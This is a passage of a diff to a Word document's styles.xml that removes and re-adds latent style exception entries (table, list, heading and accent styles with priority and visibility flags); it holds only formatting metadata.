-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="39" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
